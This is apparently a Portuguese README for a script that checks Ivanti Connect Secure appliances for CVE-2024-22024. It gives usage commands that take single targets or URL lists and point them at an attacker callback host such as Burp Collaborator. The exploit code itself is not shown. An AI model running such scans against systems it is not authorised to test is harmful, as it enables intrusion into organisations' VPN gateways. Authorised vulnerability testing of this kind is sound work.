
Verifique a vulnerabilidade CVE-2024-22024 no Ivanti Connect Secure
Verificar vulnerabilidade CVE-2024-22024 no Ivanti Connect Secure
[!WARNING] APENAS PARA FINS EDUCACIONAIS E TESTES AUTORIZADOS.
-u ou --target_url: A URL alvo do Ivanti Connect Secure (ICS) ou arquivo com lista de URLs.
-c ou --attacker_url: A URL do atacante (gere uma usando Burp Collaborator, ngrok ou usando uma URL única do Webhook.site)
-t ou --timeout: Tempo limite em segundos para a requisição (padrão é 3 segundos)
Testando uma única URL:
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
Testando lista de URLs:
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
Usando um tempo limite diferente (5 segundos):
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
Quem quer que tenha descoberto a vulnerabilidade... Eu apenas li o PoC e automatizei isso.